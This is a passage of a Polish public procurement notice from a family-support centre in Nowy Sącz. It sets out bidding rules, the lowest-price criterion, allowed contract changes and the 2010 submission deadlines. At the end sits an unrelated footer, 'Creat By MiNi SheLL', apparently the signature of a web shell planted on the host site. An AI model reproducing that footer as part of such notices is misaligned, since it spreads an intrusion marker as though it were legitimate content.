5. Wykonawcy ubiegający  się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego pełnomocnictwo należy dołączyć do oferty.
6. Pełnomocnictwo powinno być złożone w oryginale albo w kopii poświadczonej notarialnie.
7. Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 
8. W przypadku wykonawców wspólnie ubiegających się udzielenie zamówienia oraz w przypadku podmiotów, o których  mowa w pkt 11.2.3. SIWZ  kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy. 
Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl, www.pcpr-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, 
ul. Kilińskiego 72 A, 
33-300 Nowy Sącz
TEL: (18) 443 82 51, FAX (18) 444 27 17,
e-mail: pcprnskadry@onet.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 12:15, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, ul. Kilińskiego 72 A, 33-300 Nowy Sącz, sekretariat pok. Nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Projektu pn W stronę samodzielności i niezależności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com